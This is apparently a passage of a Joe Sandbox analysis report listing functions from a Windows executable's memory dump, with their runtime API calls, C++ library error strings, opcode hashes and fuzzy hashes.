Opcode ID: 0f5a7bc6cd6fd49efd1ab2f69c8439aaa4216d37fa67d7a71c11ded4c304a7e8
Instruction ID: 6a906cbc9d5f6132110930905a2a19b5db2b1ac9304bb1f43a409a3b953e96a2
Opcode Fuzzy Hash: 0f5a7bc6cd6fd49efd1ab2f69c8439aaa4216d37fa67d7a71c11ded4c304a7e8
Instruction Fuzzy Hash: EC015276A04B05CAF754AF28D8817AC73B4EB44788F884530F60D47795CF3CD6909B50

Function 00007FF729F98020 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

_configure_wide_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F98051
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F98056
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F98063
__p__wenviron.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF729F98072
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F98090

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __p___argc__p___wargv__p__wenviron_configure_wide_argv_set_new_mode
String ID:
API String ID: 3305919566-0
Opcode ID: 0f23cf09409b0d26907cff3e3a4d107db834581702d7b47b91b6b6aeeaa67cf6
Instruction ID: a02b65f4e00bf14472edc53a3c9cd9177332e43e1d9ac53ca16ca5f8b596d4f8
Opcode Fuzzy Hash: 0f23cf09409b0d26907cff3e3a4d107db834581702d7b47b91b6b6aeeaa67cf6
Instruction Fuzzy Hash: 37015276A04B05CAF754AF35D8817AD3374EB44788F984430E60D47796CF3CD6909B60

Function 00007FF72A03D3D0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 304COMMON

Download Yara Rule

Strings

basic_filebuf::xsgetn error reading the file, xrefs: 00007FF72A03D5DD

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: basic_filebuf::xsgetn error reading the file
API String ID: 0-3108371566
Opcode ID: b4a426ca3b8d3586c9d96a05829d1f1e4f268fb7c0d2b9785b49ea1444ce75b8
Instruction ID: e58ce5fc2e38bfee87de4021518f47125dfa825581f578cce44d557c72388fbd
Opcode Fuzzy Hash: b4a426ca3b8d3586c9d96a05829d1f1e4f268fb7c0d2b9785b49ea1444ce75b8
Instruction Fuzzy Hash: 1FB1D252F15B8685FB20AF368A043B9A3A1FB55BC8F988271DE4C47795FE38E485C710

Function 00007FF729FA3BDD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FA3D6E

Strings

&, xrefs: 00007FF729FA3DF8

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memset
String ID: &
API String ID: 2221118986-1010288
Opcode ID: d6a1800a9c41c2214061d5202ed132b94195d53c145a58f32f9d483b25d032c0
Instruction ID: 8fa03d8a952c10c13a1b8bd4bcc3c31446d41d48f7ac59c62f5b7211027698ba
Opcode Fuzzy Hash: d6a1800a9c41c2214061d5202ed132b94195d53c145a58f32f9d483b25d032c0
Instruction Fuzzy Hash: 2E811732A04B15C9EB90AF65C8453AC77B0FB0478CF546826EA0D57B98CFBCD690D7A0

Function 00007FF729FA39A4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FA3B24

Strings

&, xrefs: 00007FF729FA3BA7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memset
String ID: &
API String ID: 2221118986-1010288
Opcode ID: 8d1044b10714d39de10765ba2e0a7f343f060cdfa0c7677546f5d0797fd30f53
Instruction ID: 97f5f35da8b9613e19315d850cc3cbfcdd656bc37c49174e680b270bf6cb94a7
Opcode Fuzzy Hash: 8d1044b10714d39de10765ba2e0a7f343f060cdfa0c7677546f5d0797fd30f53
Instruction Fuzzy Hash: 65813736A04B51CDEB90DF65C8443AC77B0E704798F985835EA0D57B88CFB9D690DBA0

Function 00007FF729F8CB60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF729F8CB88

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 85cb6ebe368a2b02ee6037d12130406530b4ac35202a65e0c0dba2d3a4243ef3
Instruction ID: 4c8ead9ade2457195500edad2aecfd1dd5e17d8a7d47c569356070c1a1be19d4
Opcode Fuzzy Hash: 85cb6ebe368a2b02ee6037d12130406530b4ac35202a65e0c0dba2d3a4243ef3
Instruction Fuzzy Hash: B5413672A09A0289F7E0BF68CC4437DA670FB05358F984635DA3D977E4CE3CD641AA61

Function 00007FF729FBF950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00007FF729FBF98A
LocalFree.KERNEL32 ref: 00007FF729FBF9BE

Strings

basic_string: construction from null is not valid, xrefs: 00007FF729FBFA14

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: basic_string: construction from null is not valid
API String ID: 1427518018-2991274800
Opcode ID: 7c8ed238070af8e952e933038b646a8e94088f575eb2f45ce9c6900c748957ae
Instruction ID: 69e3c048d1c903d9243414aac8101d4d9daa09f2bd44b699b5e90932e8292fb8
Opcode Fuzzy Hash: 7c8ed238070af8e952e933038b646a8e94088f575eb2f45ce9c6900c748957ae
Instruction Fuzzy Hash: 2C218122A08A5691FB65BF15BC103ADE2A4EF49B90F884131DE4D07795EF3CE64A9B10

Function 00007FF72A077180 Relevance: 6.4, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A077204
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A077228

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e1cc777bf74217377d89102dbe6bdca6a76bc7c4895d87721c3079de84ea9faa
Instruction ID: 0ad943dd3f9bb142486b74f0932ec6fe68dcd331d2ae73b369b6c4a43fc29e75
Opcode Fuzzy Hash: e1cc777bf74217377d89102dbe6bdca6a76bc7c4895d87721c3079de84ea9faa
Instruction Fuzzy Hash: D9818372A04B82C5E7249F25CD4067DB3A1FB04BD8B948636EE6C57788EF38E951C760

Function 00007FF729F8BD60 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8BDE5
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729F8BDFE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F8BE09

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: d5873acf88164a1d6e7441cc3ba126a0484ba67d53d2e1bf56d3f9fe83fa97c4
Instruction ID: afdcd73f37c7ec296f3bac1537768e6b55d64e96d0710c913f5a63d25097ad86
Opcode Fuzzy Hash: d5873acf88164a1d6e7441cc3ba126a0484ba67d53d2e1bf56d3f9fe83fa97c4
Instruction Fuzzy Hash: 6F31D622A09A4349FAE27E119E00379D271FF807E5F9C8234DF5D26FD5DE2CE641AA10

Function 00007FF729FB4190 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

chunk_len == 0, xrefs: 00007FF729FB4361
/mingw/include/httplib.h, xrefs: 00007FF729FB4357

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: /mingw/include/httplib.h$chunk_len == 0
API String ID: 0-3103630078
Opcode ID: abf1582ff57daed98610bb0b36bbbdaa856649f54cab3f1e7d76a1d821e5dc40
Instruction ID: 5e42c4f89547e4bb81d4d38ad8e06ff0981fde504e77c16668dcb26795816e99
Opcode Fuzzy Hash: abf1582ff57daed98610bb0b36bbbdaa856649f54cab3f1e7d76a1d821e5dc40
Instruction Fuzzy Hash: 05716C21F0970298FF90EE6199543E9A371EB19788F9800B5DD0D17796EE2CD744AB20

Function 00007FF72A026AE0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

basic_string::basic_string, xrefs: 00007FF72A026B15, 00007FF72A026B73, 00007FF72A026BD3
basic_string::_S_construct null not valid, xrefs: 00007FF72A026C69
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A026B1C, 00007FF72A026B7A, 00007FF72A026BDA

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 83bee772141ab6abeec47775f504e6167fa554481131b4637841509cfc4c7822
Instruction ID: 6c6f067cc7e08f8df46bb0d10e405e61ac3440c2b505e78e39265a7318aacf33
Opcode Fuzzy Hash: 83bee772141ab6abeec47775f504e6167fa554481131b4637841509cfc4c7822
Instruction Fuzzy Hash: C241E6A2F0574782FF21BFA1EC542B9A355DBA5B88F844472DE0C0B355FE2CD5918B60

Function 00007FF72A0264A0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

basic_string::basic_string, xrefs: 00007FF72A0264D5, 00007FF72A026533, 00007FF72A026593
basic_string::_S_construct null not valid, xrefs: 00007FF72A026629
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A0264DC, 00007FF72A02653A, 00007FF72A02659A

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: cb3730ac8129c8c4ef42340d8b107faaabf8f20e86b8dd0908d3d004f4cceec3
Instruction ID: 8fc2c230705095f856721c3c625fc0e12e6505f4d477b536318bc41c37ae27c3
Opcode Fuzzy Hash: cb3730ac8129c8c4ef42340d8b107faaabf8f20e86b8dd0908d3d004f4cceec3
Instruction Fuzzy Hash: 8041F8A2F0574782FF21AFA1EC542B9A355DF65B84F844472DE0C0B355FE2CD6918B60

Function 00007FF729FD6150 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD6183
wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD6203

Strings

basic_string: construction from null is not valid, xrefs: 00007FF729FD61B7, 00007FF729FD6237, 00007FF729FD62B7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 75bb8393494913ee138293e47c3b5af586e38598566a93379fd258d769904ff0
Instruction ID: 9af0f3fefea9c15c9815a105857b9aa04aa8eaff71fd4e76fb67faed4a23ef65
Opcode Fuzzy Hash: 75bb8393494913ee138293e47c3b5af586e38598566a93379fd258d769904ff0
Instruction Fuzzy Hash: C5419362B59B1681EE59BF56EC500EC6321EB89F94BCD1432CD0D07764EE3CEA82D720

Function 00007FF72A01C210 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF72A01B100), ref: 00007FF72A01C282
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF72A01B100), ref: 00007FF72A01C2BB

Strings

basic_string::assign, xrefs: 00007FF72A01C318

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: 715c8530e2adc078ded41c5c8b197e09ba83f0c17ca8b6076f7fa96b5e018738
Instruction ID: fae90483543417707a720d1ff06f5ee22b1754256d2429f28c64499dc0e90da7
Opcode Fuzzy Hash: 715c8530e2adc078ded41c5c8b197e09ba83f0c17ca8b6076f7fa96b5e018738
Instruction Fuzzy Hash: 7B419022B0965681FB20AB69D9441BDE3A0EB45FD4FD89271DE0D47390FE2CE5429760

Function 00007FF729FD2CE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000,?,00007FF729FABAA5), ref: 00007FF729FD2D18
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF729FABAA5), ref: 00007FF729FD2DC1

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF729FD2D55, 00007FF729FD2DFE, 00007FF729FD2E17
basic_string::compare, xrefs: 00007FF729FD2D4E, 00007FF729FD2DF7, 00007FF729FD2E10

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcmp
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 1475443563-1697194757
Opcode ID: 1d6ce5a7110eb6cc7bc8158a27395d924a9c15a1e54c17fb187cf1cf3a95c721
Instruction ID: 06926676e2d8456fb2cda275d9efdd126e0f3e887b209f006e7d8ea8fc1b2ad2
Opcode Fuzzy Hash: 1d6ce5a7110eb6cc7bc8158a27395d924a9c15a1e54c17fb187cf1cf3a95c721
Instruction Fuzzy Hash: 8C31D0A2B0598781FF50AF2AED102E59260DF44BD0F8C4231EE1C57791EE2CDA829620

Function 00007FF72A025750 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A0257F5

Strings

basic_string::_M_replace_aux, xrefs: 00007FF72A025835
basic_string::insert, xrefs: 00007FF72A025785, 00007FF72A025829
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A02578F, 00007FF72A025822

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
